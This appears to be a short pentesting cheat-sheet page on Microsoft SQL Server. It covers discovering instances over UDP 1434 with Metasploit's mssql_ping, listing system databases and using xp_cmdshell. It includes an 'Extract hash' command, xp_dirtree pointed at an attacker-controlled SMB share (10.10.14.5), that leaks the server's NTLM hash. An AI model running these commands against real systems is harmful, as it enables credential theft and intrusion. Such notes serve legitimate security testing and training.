SQL Server
Microsoft SQL Server
Last updated
Microsoft SQL Server
Last updated
Searching for and locating MSSQL installations inside the internal network can be achieved using UDP foot-printing. When MSSQL installs, it installs either on TCP port 1433 or a randomized dynamic TCP port. If the port is dynamically attributed, querying UDP port 1434 will provide us with information on the server including the TCP port on which the service is listening.
msf > use auxiliary/scanner/mssql/mssql_ping
On every SQL Server instance there is a number of default system databases. Those are: - master - keeps the information for an instance of SQL Server. - msdb - used by SQL Server Agent. - model - template database copied for each new database. - resource - read only database that keeps system objects that are visible in every database on the server in sys schema. - tempdb - keeps temporary objects for SQL queries.
- DB list - SELECT name FROM master.dbo.sysdatabases - Extract hash - exec xp_dirtree '\\10.10.14.5\SHARE' - Execute commands - https://docs.microsoft.com/en-us/sql/t-sql/statements/execute-as-transact-sql?view=sql-server-ver16 User should be a member of 'sysadmin' role. Query - select IS_SRVROLEMEMBER('sysadmin');
- xp_cmdshell is a very powerful feature and disabled by default. xp_cmdshell can be enabled and disabled by using the Policy-Based Management or by executing sp_configure. - When it is called by a user that is not a member of the sysadmin fixed server role, xp_cmdshell connects to Windows by using the account name and password stored in the credential named ##xp_cmdshell_proxy_account##. If this proxy credential does not exist, xp_cmdshell will fail.